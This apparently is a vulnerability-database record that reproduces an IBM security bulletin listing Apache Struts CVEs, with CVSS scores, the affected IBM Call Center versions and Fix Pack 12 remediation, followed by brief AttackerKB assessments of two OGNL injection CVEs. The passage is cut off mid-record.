**[CVE-2012-0838](<https://vulners.com/cve/CVE-2012-0838>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the evaluation of an OGNL expression during a conversion error. An attacker could exploit this vulnerability using invalid input to a field to modify run-time data and execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/73690](<https://exchange.xforce.ibmcloud.com/vulnerabilities/73690>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-7809](<https://vulners.com/cve/CVE-2014-7809>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by predictable tokens. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass cross-site request forgery security measures. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/98963](<https://exchange.xforce.ibmcloud.com/vulnerabilities/98963>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2011-5057](<https://vulners.com/cve/CVE-2011-5057>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to block access to the session map by the org.apache.struts2.interceptor.SessionAware or org.apache.struts2.interceptor.RequestAware interfaces. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to modify the session map. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/71654](<https://exchange.xforce.ibmcloud.com/vulnerabilities/71654>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-4387](<https://vulners.com/cve/CVE-2012-4387>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an error when handling request parameters. A remote attacker could exploit this vulnerability using a specially-crafted parameter name containing an OGNL expression to consume all available CPU resources. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/78183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/78183>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n \n** CVEID: **[CVE-2012-1006](<https://vulners.com/cve/CVE-2012-1006>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the editPerson.action and struts2-rest-showcase/orders scripts. A remote attacker could exploit this vulnerability using the name, lastName or clientNape parameter in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72888](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72888>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-0392](<https://vulners.com/cve/CVE-2012-0392>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the failure to properly restrict access to static methods by the CookieInterceptor class. An attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72088](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72088>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-0094](<https://vulners.com/cve/CVE-2014-0094>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in ParametersInterceptor. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92205](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92205>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2013-1965](<https://vulners.com/cve/CVE-2013-1965>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error in the Apache Struts Showcase App. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary code on the system. \nCVSS Base score: 6.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85573](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85573>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-0112](<https://vulners.com/cve/CVE-2014-0112>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to ParametersInterceptor and the failure to restrict access to the class parameter. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92740](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92740>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2134](<https://vulners.com/cve/CVE-2013-2134>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84762](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84762>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2016-3081](<https://vulners.com/cve/CVE-2016-3081>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the passing of a malicious expression when Dynamic Method Invocation is enabled. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 5.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/112528](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112528>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2014-0113](<https://vulners.com/cve/CVE-2014-0113>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to CookieInterceptor and the failure to restrict access to the getClass() method. An attacker could exploit this vulnerability using CookieInterceptor when configured to accept all cookies to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92742](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92742>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2135](<https://vulners.com/cve/CVE-2013-2135>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84763](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84763>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2013-4316](<https://vulners.com/cve/CVE-2013-4316>) \n** DESCRIPTION: **An unspecified error in Apache Struts related to the default enabling of Dynamic Method Invocation (DMI) could lead to remote code execution. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/87373](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87373>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n** CVEID: **[CVE-2012-0391](<https://vulners.com/cve/CVE-2012-0391>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the interpretation of parameter values as OGNL expressions by the ExceptionDelegator command. An attacker could exploit this vulnerability using a specially-crafted parameter to execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72229](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72229>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2012-0393](<https://vulners.com/cve/CVE-2012-0393>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to traverse directories on the system, caused by the improper validation of input by ParameterInterceptor prior to being used to create files. An attacker could send a specially-crafted URL request containing directory traversal sequences to create or overwrite arbitrary files on the system. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72089](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72089>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-4386](<https://vulners.com/cve/CVE-2012-4386>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site request forgery, caused by improper validation of the token name configuration parameter by the token handling mechanism. By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to perform unauthorized actions. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/78182](<https://exchange.xforce.ibmcloud.com/vulnerabilities/78182>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2016-4003](<https://vulners.com/cve/CVE-2016-4003>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the URLDecoder implementation. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/111514](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111514>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2016-3093](<https://vulners.com/cve/CVE-2016-3093>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by the improper implementation of cache used to store method references by the OGNL expression language. An attacker could exploit this vulnerability to block access to a Web site. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/113686](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113686>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2013-4310](<https://vulners.com/cve/CVE-2013-4310>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the action: parameter prefix. An attacker could exploit this vulnerability to gain unauthorized access to the system. \nCVSS Base score: 5.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/87336](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87336>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N) \n \n** CVEID: **[CVE-2014-0116](<https://vulners.com/cve/CVE-2014-0116>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to properly restrict access to the getClass() method by the CookieInterceptor class. An attacker could exploit this vulnerability to manipulate the ClassLoader used by the application server. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/93024](<https://exchange.xforce.ibmcloud.com/vulnerabilities/93024>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2010-1870](<https://vulners.com/cve/CVE-2010-1870>) \n** DESCRIPTION: **XWork, as used in Apache Struts, FishEye and Crucible, could allow a remote attacker to bypass security restrictions, caused by an error in the ParameterInterceptor class. An attacker could exploit this vulnerability using specially-crafted OGNL (Object-Graph Navigation Language) expressions to modify server-side objects and possibly execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/60371](<https://exchange.xforce.ibmcloud.com/vulnerabilities/60371>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2016-3082](<https://vulners.com/cve/CVE-2016-3082>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of XSLTResult to parse arbitrary stylesheet. An attacker could exploit this vulnerability to inject and execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/112527](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112527>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2016-4436](<https://vulners.com/cve/CVE-2016-4436>) \n** DESCRIPTION: **An unspecified error Apache Struts related to the method used to clean up action name has an unknown impact and attack vector. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/114183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2013-2251](<https://vulners.com/cve/CVE-2013-2251>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating the action:, redirect:, and redirectAction: parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary commands on the system. Note: This vulnerability affects other products. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85756](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85756>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2017-12611](<https://vulners.com/cve/CVE-2017-12611>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of an unintentional expression in Freemarker tag instead of string literals. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/131603](<https://exchange.xforce.ibmcloud.com/vulnerabilities/131603>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2015-5209](<https://vulners.com/cve/CVE-2015-5209>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to gain unauthorized access to the system. An attacker could exploit this vulnerability using a special top-level object to manipulate internal settings and modify another user session. \nCVSS Base score: 9.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106695](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106695>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) \n \n** CVEID: **[CVE-2013-2115](<https://vulners.com/cve/CVE-2013-2115>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an incomplete fix for an error related to the handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84543](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84543>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-1966](<https://vulners.com/cve/CVE-2013-1966>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restriction, caused by the improper handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject OGNL code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84542](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84542>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2248](<https://vulners.com/cve/CVE-2013-2248>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability in the DefaultActionMapper class. An attacker could exploit this vulnerability using the redirect: and redirectAction:: parameters in a specially-crafted URL to redirect a victim to arbitrary Web sites. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85755](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85755>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2015-2992](<https://vulners.com/cve/CVE-2015-2992>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when directly accessing JSP files. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106172](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106172>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2015-5169](<https://vulners.com/cve/CVE-2015-5169>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when debug mode is enabled. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/105879](<https://exchange.xforce.ibmcloud.com/vulnerabilities/105879>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Call Center for Commerce| 9.5.0 \nIBM Call Center for Commerce| 10.0 \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading to the latest fixpack that has the upgraded version of Apache Struts. Please note the fixpack only applies to IBM Call Center version 10 and if you are running IBM Call Center version 9.5 a product upgrade must be completed first. IBM Call Center version 9.5 reached end of support April 30, 2022.\n\nCall Center installing Fix Pack 12 - <https://www.ibm.com/docs/en/call-center/10.0?topic=center-installing-fix-packs>\n\nFix Pack 12 download location - [https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=10.0.0.0-Sterling-ISCCS-All-fp12-Installer&product=ibm%2FOther%20software%2FIBM%20Call%20Center%20for%20Commerce&source=dbluesearch&mhsrc=ibmsearch_a&mhq=10.0.0.0-Sterling&function=fixId&parent=ibm/Other%20software](<https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=10.0.0.0-Sterling-ISCCS-All-fp12-Installer&product=ibm%2FOther%20software%2FIBM%20Call%20Center%20for%20Commerce&source=dbluesearch&mhsrc=ibmsearch_a&mhq=10.0.0.0-Sterling&function=fixId&parent=ibm/Other%20software>)\n\nIBM Call Center release notes - <https://www.ibm.com/docs/en/call-center/10.0?topic=center-fixes-by-fix-pack-version#fp12>\n\nCreating & Extending Struts - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=cesf-creating-extending-struts-xml-file-in-web-ui-framework>\n\n## Workarounds and Mitigations\n\nBM strongly recommends addressing the vulnerability now by upgrading to the latest fixpack that has the upgraded version of Apache Struts. Please note the fixpack only applies to IBM Call Center version 10 and if you are running IBM Call Center version 9.5 a product upgrade must be completed first. IBM Call Center version 9.5 reached end of support April 30, 2022.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-14T17:37:56", "type": "ibm", "title": "Security Bulletin: IBM Call Center and Apache Struts Struts upgrade strategy (various CVEs, see below)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870", "CVE-2011-1772", "CVE-2011-5057", "CVE-2012-0391", "CVE-2012-0392", "CVE-2012-0393", "CVE-2012-0838", "CVE-2012-1006", "CVE-2012-4386", "CVE-2012-4387", "CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251", "CVE-2013-4310", "CVE-2013-4316", "CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113", "CVE-2014-0116", "CVE-2014-7809", "CVE-2015-2992", "CVE-2015-5169", "CVE-2015-5209", "CVE-2016-3081", "CVE-2016-3082", "CVE-2016-3093", "CVE-2016-4003", "CVE-2016-4436", "CVE-2017-12611", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530"], "modified": "2022-09-14T17:37:56", "id": "43ABDDEF8A51FB28FC8C4825BAD26A0A25F5F21805BFC87561A0AEABFD065F37", "href": "https://www.ibm.com/support/pages/node/6620351", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-07-20T23:33:10", "description": "Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 \u2013 Struts 2.5.25.\n\n \n**Recent assessments:** \n \n**wvu-r7** at December 08, 2020 6:53pm UTC reported:\n\nSee my [assessment](<https://attackerkb.com/assessments/92642728-1fa2-4a4e-9750-297f18f0cc0b>) on [CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230>). [Apache themselves](<https://cwiki.apache.org/confluence/display/WW/S2-061>) said this is similar to [S2-059](<https://cwiki.apache.org/confluence/display/WW/S2-059>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-11T00:00:00", "type": "attackerkb", "title": "CVE-2020-17530", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2020-17530"], "modified": "2020-12-15T00:00:00", "id": "AKB:CF76EF1F-CB59-4A29-ADB1-DA37C695142B", "href": "https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:44:49", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:30pm UTC reported:\n\nUnlike [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>), which was exploitable out of the box, since it targeted Struts\u2019 Jakarta multipart parser, this vulnerability requires a certain set of circumstances to be true in order for Struts to be exploitable. Since Struts is a web application framework, this will depend entirely on the application the developers have created.\n\n**I don\u2019t know how common this particular scenario is.** Please read the [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-059>) for more information. However, what I do know is that this CVE falls somewhere after [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>) and [CVE-2018-11776](<https://attackerkb.com/topics/jgIUjIdFUR/cve-2018-11776>) on the exploitability scale, from most exploitable to least: a parser flaw, a configuration flaw, and a programming flaw.\n\nSo, definitely patch this, but also follow Struts development best practices, including those outlined in their security bulletins. No measure of mitigations will protect you from poorly written code.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T00:00:00", "type": "attackerkb", "title": "CVE-2019-0230", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776", "CVE-2019-0230"], "modified": "2023-10-07T00:00:00", "id": "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "href": "https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230", "cvss": {"score": 10.0, "vector": 